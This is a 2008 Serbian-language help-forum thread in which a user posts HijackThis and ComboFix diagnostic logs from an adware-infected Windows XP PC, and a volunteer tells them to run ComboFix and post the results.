MyCity » Ambulanta -> Arhiva Ambulante » virus!

virus!

Napisano na dan: 2.6.2008

virus!
Sledeća strana Pagination

Idi na vrh

Poslao: 02 Jun 2008 21:02
Idi na vrh
offline
  • Pridružio: 19 Maj 2008
  • Poruke: 5
  • Gde živiš: beograd

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:44:21, on 2.6.2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\UAService7.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Program Files\Analog Devices\SoundMAX\smax4.exe
C:\Program Files\Eset\nod32kui.exe
C:\WINDOWS\system32\WgaTray.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe
C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE
C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE
C:\Program Files\LimeWire\LimeWire.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
C:\Program Files\Opera\Opera.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\WINDOWS\system32\wscntfy.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\Program Files\AVG\AVG8\avgfrw.exe
C:\Program Files\AVG\AVG8\avgtray.exe
C:\PROGRA~1\AVG\AVG8\avgupd.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = [Link mogu videti samo ulogovani korisnici]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = [Link mogu videti samo ulogovani korisnici]
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = [Link mogu videti samo ulogovani korisnici]
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = 127.0.0.1
R3 - URLSearchHook: (no name) - {9CB65206-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL (file missing)
R3 - URLSearchHook: (no name) - {00A6FAF6-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL (file missing)
R3 - URLSearchHook: Yahoo! ¤u¨a¦C - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: MyWebSearch Search Assistant BHO - {00A6FAF1-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL (file missing)
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: mwsBar BHO - {07B18EA1-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL (file missing)
O2 - BHO: (no name) - {23D44BCF-AA7A-41D6-8905-E808F16322EF} - C:\WINDOWS\system32\gebbxvw.dll (file missing)
O2 - BHO: cpmsky browser optimizer - {277a0c59-78e6-99de-6946-a2a71f55165a} - C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll
O2 - BHO: {ed108e55-6531-0438-6864-6d2ea2229663} - {3669222a-e2d6-4686-8340-135655e801de} - C:\WINDOWS\system32\xhvgmvfa.dll (file missing)
O2 - BHO: adzgalore - {386c1b5e-df71-2d31-08e7-83354bf04e50} - C:\WINDOWS\system32\nskD4.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: (no name) - {517854CF-7B97-4204-BC88-13768F2CCF61} - C:\WINDOWS\system32\ssttu.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: UrlHelper Class - {74322BF9-DF26-493f-B0DA-6D2FC5E6429E} - C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live pomagac za prijavljivanje - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Ask Search Assistant BHO - {9CB65201-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL (file missing)
O2 - BHO: AVG Security Toolbar - {A057A204-BACC-4D26-9990-79A187E2698E} - C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL
O2 - BHO: mysidesearch browser optimizer - {bec35b16-b03b-b4e6-8917-3250adcd93bc} - C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
O2 - BHO: Ask Toolbar BHO - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\2.bin\ASKTBAR.DLL (file missing)
O3 - Toolbar: Ask Toolbar - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\2.bin\ASKTBAR.DLL (file missing)
O3 - Toolbar: My Web Search - {07B18EA9-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL (file missing)
O3 - Toolbar: Yahoo! ¤u¨a¦C - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: BearShare MediaBar - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareMediaBar.dll
O3 - Toolbar: AVG Security Toolbar - {A057A204-BACC-4D26-9990-79A187E2698E} - C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\smax4.exe" /tray
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
O4 - HKLM\..\Run: [bend logo clock film] C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe
O4 - HKLM\..\Run: [{e0b2bd96-0d3c-b2e0-b9b8-fdc3e3b7792d}] C:\WINDOWS\System32\Rundll32.exe "C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll" DllInit
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [RealInter] C:\DOCUME~1\NETWOR~1\APPLIC~1\MOVESI~1\Bat flag close.exe
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - Startup: LimeWire On Startup.lnk = C:\Program Files\LimeWire\LimeWire.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
O4 - Global Startup: Adobe Reader Synchronizer.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe
O4 - Global Startup: AudioDeck.lnk = C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe
O4 - Global Startup: Remote Controller.lnk = C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE
O4 - Global Startup: Scheduler.lnk = C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE
O8 - Extra context menu item: &Search - [Link mogu videti samo ulogovani korisnici]
O8 - Extra context menu item: E&xport to Microsoft Excel - [Link mogu videti samo ulogovani korisnici]\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll
O20 - AppInit_DLLs: avgrsstx.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe

--
End of file - 9792 bytes



Poslao: 02 Jun 2008 21:10
Idi na vrh
offline
  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Pridružio: 24 Jul 2007
  • Poruke: 12280
  • Gde živiš: Höganäs, SE

Poz...


Skini ComboFix sa jedne od sledecih adresa na Desktop:
[Link mogu videti samo ulogovani korisnici]
[Link mogu videti samo ulogovani korisnici]
[Link mogu videti samo ulogovani korisnici]

Startuj ga i ne diraj prozor programa dok skenira.
Sledi uputstva na ekranu. Kada zavrsi pojavice se log (C:\ComboFix.txt) koji ces nam ovde iskopirati.



Poslao: 02 Jun 2008 21:56
Idi na vrh
offline
  • Pridružio: 19 Maj 2008
  • Poruke: 5
  • Gde živiš: beograd

ComboFix 08-06-01.6 - n 2008-06-02 21:38:59.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.96 [GMT 2:00]
Running from: C:\Documents and Settings\n\My Documents\ComboFix.exe

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Bob and Bill adventures - Wild Hunting.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Crazy Blocks.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Lines.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\The Battles Of Helicopters.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Video Pool.lnk
C:\WINDOWS\17PHolmes2000201.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll
C:\WINDOWS\system32\arlfnpmy.ini
C:\WINDOWS\system32\bslxdnsl.ini
C:\WINDOWS\system32\exworkdw.ini
C:\WINDOWS\system32\hjechnje.ini
C:\WINDOWS\system32\hqmjjueu.ini
C:\WINDOWS\system32\iadlmobi.dll
C:\WINDOWS\system32\kxghksxx.ini
C:\WINDOWS\system32\lsndxlsb.dll
C:\WINDOWS\system32\nainpaun.ini
C:\WINDOWS\system32\nskD4.dll
C:\WINDOWS\system32\sdjwdqvw.ini
C:\WINDOWS\system32\sqlgnaju.ini
C:\WINDOWS\system32\ssttu.dll
C:\WINDOWS\system32\suubjcjh.dll
C:\WINDOWS\system32\tounsikg.ini
C:\WINDOWS\system32\uttss.ini
C:\WINDOWS\system32\uttss.ini2
C:\WINDOWS\system32\ympnflra.dll
.
---- Previous Run -------
.
C:\Program Files\Adzgalore Games Collection
C:\Program Files\Adzgalore Games Collection\BattlesOfHelicopters.exe
C:\Program Files\Adzgalore Games Collection\BobAndBill.exe
C:\Program Files\Adzgalore Games Collection\CrazyBlocks.exe
C:\Program Files\Adzgalore Games Collection\Lines.exe
C:\Program Files\Adzgalore Games Collection\uninstall.exe
C:\Program Files\Adzgalore Games Collection\VideoPool.exe
C:\WINDOWS\cookies.ini
C:\WINDOWS\system32\adzgalore-remove.exe

.
((((((((((((((((((((((((( Files Created from 2008-05-02 to 2008-06-02 )))))))))))))))))))))))))))))))
.

2008-06-02 21:32 . 2008-06-02 21:32 2,280 --a------ C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:28 . 2008-06-02 20:28 10,520 --a------ C:\WINDOWS\system32\avgrsstx.dll
2008-06-02 20:27 . 2008-06-02 20:39 <DIR> d-------- C:\WINDOWS\system32\drivers\Avg
2008-06-02 20:27 . 2008-06-02 20:27 <DIR> d-------- C:\Program Files\AVG
2008-06-02 20:27 . 2008-06-02 21:34 <DIR> d-------- C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-02 20:27 . 2008-06-02 21:32 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\avg8
2008-06-02 20:27 . 2008-06-02 20:27 96,520 --a------ C:\WINDOWS\system32\drivers\avgldx86.sys
2008-06-01 20:41 . 2008-06-01 20:41 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\move sixth tool
2008-06-01 20:40 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41 <DIR> d-------- C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30 <DIR> d-------- C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12 <DIR> d-------- C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Program Files\Ashiyane Digital Security Team
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21 75 --a------ C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47 <DIR> d-------- C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47 <DIR> d-------- C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39 483,328 --a------ C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52 <DIR> d-------- C:\Program Files\BearShare Applications
2008-05-17 21:07 . 2008-05-17 21:07 95,865 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
2008-05-17 21:03 . 2008-05-17 21:03 63,916 --a------ C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
2008-05-16 16:12 . 2008-05-16 16:12 440,832 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
2008-05-14 03:28 . 2008-05-14 03:28 41,296 --a------ C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57 <DIR> d-------- C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-02 21:33 <DIR> d-------- C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23 <DIR> d-------- C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19 691,545 --a------ C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37 2,546 --a------ C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51 <DIR> d--hsc--- C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16 <DIR> d-------- C:\Program Files\Spybot - Search & Destroy

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-02 19:27 --------- d-----w C:\Program Files\ESET
2008-05-27 19:26 --------- d-----w C:\Program Files\MSN Messenger
2008-05-27 19:25 --------- d-----w C:\Program Files\Messenger Plus! Live
2008-05-27 18:35 --------- d-----w C:\Program Files\Common Files\Adobe
2008-05-26 19:48 --------- d-----w C:\Program Files\Macrogaming
2008-05-26 19:47 --------- d-----w C:\Program Files\Free Download Manager
2008-05-26 19:47 --------- d-----w C:\Program Files\Championship Manager 5
2008-05-26 19:46 --------- d-----w C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23 81,920 ----a-w C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23 47,360 ----a-w C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23 --------- d-----w C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38 --------- d-----w C:\Program Files\Yahoo!
2008-05-16 18:36 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-05-12 17:04 --------- d-----w C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13 --------- d-----w C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22 --------- d-----w C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50 --------- d-----w C:\Program Files\Windows Live
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\n\Application Data\move sixth tool
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 20:02 --------- d-----w C:\Program Files\move sixth tool
2008-04-28 20:02 --------- d-----w C:\Documents and Settings\All Users\Application Data\Frag great bend logo
2008-04-28 20:01 --------- d-----w C:\Program Files\Circle Developement
2008-04-28 16:59 --------- d-----w C:\Program Files\Lystech Computing
2008-04-21 17:34 744 ----a-w C:\mail.vbs
2008-04-18 19:19 --------- d-----w C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14 --------- d-----w C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08 --------- d-----w C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37 --------- d-----w C:\Program Files\MauZ Php Editor
2008-04-09 15:01 --------- d-----w C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45 --------- d-----w C:\Program Files\Apple Software Update
2008-04-07 15:44 --------- d-----w C:\Documents and Settings\All Users\Application Data\Apple
2008-04-04 19:17 --------- d-----w C:\Program Files\Vista Start Menu
2008-04-04 18:50 64,650 ----a-w C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50 6,106 ----a-w C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 10:18 720,896 ----a-w C:\WINDOWS\iun6002.exe
2008-04-02 18:06 --------- d-----w C:\Program Files\Zone Labs
2008-04-02 10:02 --------- d-----w C:\Program Files\Java
2007-11-05 12:00 524,300 ----a-w C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28 1,164,456 ----a-w C:\Program Files\install_flash_player.exe
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{3669222a-e2d6-4686-8340-135655e801de}]
C:\WINDOWS\system32\xhvgmvfa.dll

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45 402872 --a------ C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{A057A204-BACC-4D26-9990-79A187E2698E}]
2008-06-02 20:27 2050816 --a------ C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{bec35b16-b03b-b4e6-8917-3250adcd93bc}]
2008-05-16 16:12 440832 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{A057A204-BACC-4D26-9990-79A187E2698E}"= "C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL" [2008-06-02 20:27 2050816]

[HKEY_CLASSES_ROOT\clsid\{a057a204-bacc-4d26-9990-79a187e2698e}]
[HKEY_CLASSES_ROOT\avgtoolbar.AVGTOOLBAR]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser]
"{A057A204-BACC-4D26-9990-79A187E2698E}"= C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL [2008-06-02 20:27 2050816]

[HKEY_CLASSES_ROOT\clsid\{a057a204-bacc-4d26-9990-79a187e2698e}]
[HKEY_CLASSES_ROOT\avgtoolbar.AVGTOOLBAR]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"RealInter"="C:\DOCUME~1\NETWOR~1\APPLIC~1\MOVESI~1\Bat flag close.exe" [2008-04-28 22:02 479232]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"bend logo clock film"="C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe" [2008-06-02 21:49 549888]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]
"AVG8_TRAY"="C:\PROGRA~1\AVG\AVG8\avgtray.exe" [2008-06-02 20:27 1177368]

C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=avgrsstx.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=
"C:\\Program Files\\AVG\\AVG8\\avgupd.exe"=

R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R1 AvgLdx86;AVG AVI Loader Driver x86;C:\WINDOWS\system32\Drivers\avgldx86.sys [2008-06-02 20:27]
